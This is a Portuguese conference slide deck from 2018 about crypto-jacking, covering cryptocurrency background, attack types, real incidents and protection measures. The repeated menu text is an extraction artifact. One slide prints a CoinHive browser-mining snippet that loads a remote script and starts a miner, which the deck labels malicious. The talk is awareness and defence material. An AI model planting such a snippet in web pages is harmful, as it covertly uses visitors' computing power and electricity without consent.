Recomendados
Mais conteúdo relacionado
Semelhante a Nova era-crypto-jacking
Semelhante a Nova era-crypto-jacking (20)
Último
Último (20)
Nova era-crypto-jacking
- 1. A Nova Era do Pedro Tavares <sirpedrotavares@gmail.com> https://seguranca-informatica.pt 21 de março de 2018 ll Jornadas de InfoWeb
- 2. Agenda ● A Importância da Cibersegurança ● O que é Crypto-jacking ● Cryptocurrency - The Inception ● Tipos de Crypto-jacking ● Crypto-jacking em Páginas Web ● Crypto-jacking em Redes Wi-Fi ● Crypto-jacking “ In-the-Wild ” ● Anúncios versus Crypto-mining ● Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 3. Importância da Cibersegurança Preocupações em 2018 ● Internet of Thing (IoT) ● Mobile ● Inteligência Artificial ● Sistemas descentralizados (blockchain) ● Crypto-jacking ● (...) Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Meios e tecnologias para proteçãoCibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 4. O que é Crypto-jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 5. O que é Crypto-jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Crypto-jacking Crypto-mining Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 6. O que é Crypto-jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Crypto-jacking acontece quando o mining é feito de forma ilegal, i.e., sem consentimento e conhecimento Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 7. Cryptocurrency - The Inception [1] “Security without Identification: Transaction Systems to Make Big Brother Obsolete" https://www.cs.ru.nl/~jhh/pub/secsem/chaum1985bigbrother.pdf [2] Cyberpunks e outras propostas de moedas criptográficas: https://www.coindesk.com/the-rise-of-the-cypherpunks/ Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 8. Cryptocurrency - The Inception Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 9. Cryptocurrency - The Inception Criptomoedas tornaram-se uma nova tendência ● Bitcoin ● Ether ● Litecoin ● NEM ● Monero Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 10. Tipos de Crypto-jacking ● Crypto-jacking em Páginas Web ● Crypto-jacking em Redes Wi-Fi ● Crypto-jacking “in-the-wild” Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 11. Crypto-jacking em Páginas Web Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção <script src=”https://coin-hive.com/lib/coinhive.min.js“></script> <script> var miner = new CoinHive.Anonymous(‘YOUR_TOKEN’);//Monero ID miner.start(); </script> Código malicioso de mineração Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 12. Crypto-jacking em redes Wi-Fi Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 13. Crypto-jacking “ In-the-Wild “ Para todo o tipo de gostos :) ● SQL Injection ● XSS + Social Engineering ● Malware ○ Dofoil (infetou mais de 500.000 computadores Windows) ○ PyCryptoMiner - SSH (dropper instala bot para minerar criptomedas) ○ Tesla Cloud — Ciber atacantes usaram processamento na Cloud ○ Plugins CMS infetados (Browsealoud, etc.) ■ Crypto-jacking em websites (Los Angels Times, Dinheiro Vivo, CR7) ○ Software e extensões com crypto-miners (Jenkins, ApacheCouchDB, Archive Poster - extensão Google Chrome) Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 14. Anúncios versus Crypto-mining jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Motivação - Obter dinheiro fácil através da capacidade de processamento e eletricidade de terceiros (crypto-mining => jacking Crypto-mining jacking Problemas: - Pouco retorno (1k visits - 55 sec - €0.36) - Desempenho (website, browser, PC, Internet) - Notificação prévia + consentimento Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 15. Proteção Ponto de vista: Utilizador ● Opera lançou módulo nativo ● Extensão Chrome: NoCoin ● AV ● Consciencialização (estar alerta) + Ação (notificar) Infraestrutura ● Monitorização (IDS, WAFs, etc) ● Cibersegurança contínua ● Auditorias de segurança ● Consciencialização + Ação Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
- 16. ~ «O meu grande bem-haja a todos» ~ Pedro Tavares <sirpedrotavares@gmail.com>